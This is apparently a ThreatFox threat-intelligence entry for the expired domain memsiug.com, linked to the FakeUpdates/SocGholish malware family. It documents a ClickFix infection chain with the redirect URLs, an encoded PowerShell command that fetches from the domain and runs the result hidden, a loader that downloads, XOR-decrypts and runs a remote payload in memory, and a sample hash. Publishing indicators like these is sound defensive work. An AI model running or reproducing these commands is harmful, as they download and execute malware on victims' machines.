ThreatFox IOC Database
You are viewing the ThreatFox database entry for domain memsiug.com.
Database Entry
This IOC expired
This IOC is an old IOC and hence has expired on 2026-06-04 01:15:01 UTC. We therefore refrain from exporting it into our datasets. As a result, this database entry is purely informational and has no impact.
| IOC ID: | 1516221 |
|---|---|
| IOC: | memsiug.com |
| IOC Type : | domain |
| Threat Type : | payload_delivery |
| Malware: | FAKEUPDATES |
| Malware alias: | FakeUpdate, GhoLoader, SocGholish |
| Confidence Level : | Confidence level is high (100%) |
| Is compromised? : | False |
| ASN: | AS13335 CLOUDFLARENET |
| Country: |  US |
| First seen: | 2025-05-06 05:31:41 UTC |
| Last seen: | never |
| UUID: | 9b12dd52-29df-11f0-adfc-42010aa4000a |
| Reporter |  rmceoin |
| Reward | 5 credits from ThreatFox |
| Tags: | CoreSecThree |
rmceoin
https://analytiwave.com/api/getUrl->
https://sharecloudes.com/1a2B3c4D5e6F7a8B9c0D1e2F3a4B5c
->
https://security.yourclodd.com/9a8B7c6D5e4F3a2B1c0D9e8F7a6B5c
->
https://security.yourclodd.com/?domain=
(ClickFix)
->
powershell -E KAAmACAAIgBcAFcAKgBcAFMAKgAzADIAXABjAHUAcgAqAGUAIgAgACIAaAB0AHQAcABzADoALwAvAG0AZQBtAHMAaQB1AGcALgBjAG8AbQAiACkAfABwAG8AdwBlAHIAcwBoAGUAbABsACAALQB3ACAAaAA=
->
(& "\W*\S*32\cur*e" "https://memsiug.com")|powershell -w h
->
https://memsiug.com
->
$d = (New-Object System.Net.WebClient).DownloadData("https://security.yourclodd.com/D5a1B2f6A8c7E9d3F0b4C2f1E7A61/j1XDoz7enr.dat")
$k = [System.Text.Encoding]::UTF8.GetBytes("mmK1uic7f")
$x = New-Object byte[] $d.Length
for ($i = 0; $i -lt $d.Length; $i++) { $x[$i] = $d[$i] -bxor $k[$i % $k.Length] }
$a = [System.Reflection.Assembly]::Load($x)
if ($a.EntryPoint) { $a.EntryPoint.Invoke($null, @()) }
->
https://security.yourclodd.com/D5a1B2f6A8c7E9d3F0b4C2f1E7A61/j1XDoz7enr.dat
d32bfaf966aa5f0d8989a13a791306f3e94c6f5ade8866f164a961bfabfa2a98 Xin2h9rhun.exe